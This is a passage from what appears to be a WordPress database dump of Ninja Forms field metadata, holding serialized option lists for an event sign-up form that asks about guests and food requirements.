href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:3;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"3\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:4;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"4\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:4:\"Four\";s:5:\"value\";s:4:\"four\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}}','options','a:5:{i:0;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"0\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:4:\"None\";s:5:\"value\";s:4:\"none\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:3;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"3\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:4;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"4\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:4:\"Four\";s:5:\"value\";s:4:\"four\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}}'),(13641,437,'container_class','','container_class',''),(13642,437,'element_class','','element_class',''),(13643,437,'admin_label','','admin_label',''),(13644,437,'help_text','','help_text',''),(13645,437,'desc_text','','desc_text',''),(13646,437,'field_label','How many friends will you bring along?','field_label','How many friends will you bring along?'),(13647,437,'field_key','how_many_friends_will_you_bring_along','field_key','how_many_friends_will_you_bring_along'),(13648,437,'parent_id','47','parent_id','47'),(13649,438,'objectType','Field','objectType','Field'),(13650,438,'objectDomain','fields','objectDomain','fields'),(13651,438,'editActive','','editActive',''),(13652,438,'order','9','order','9'),(13653,438,'label','Any food requirements?','label','Any food requirements?'),(13654,438,'key','any_food_requirements','key','any_food_requirements'),(13655,438,'type','listradio','type','listradio'),(13656,438,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(13657,438,'label_pos','default','label_pos','default'),(13658,438,'required','1','required','1'),(13659,438,'options','a:4:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Vegan\";s:5:\"value\";s:5:\"vegan\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Vegitarian\";s:5:\"value\";s:10:\"vegetarian\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:2;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:11:\"Gluten Free\";s:5:\"value\";s:9:\"no-gluten\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:3;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"None\";s:5:\"value\";s:4:\"none\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"3\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}}','options','a:4:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Vegan\";s:5:\"value\";s:5:\"vegan\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons 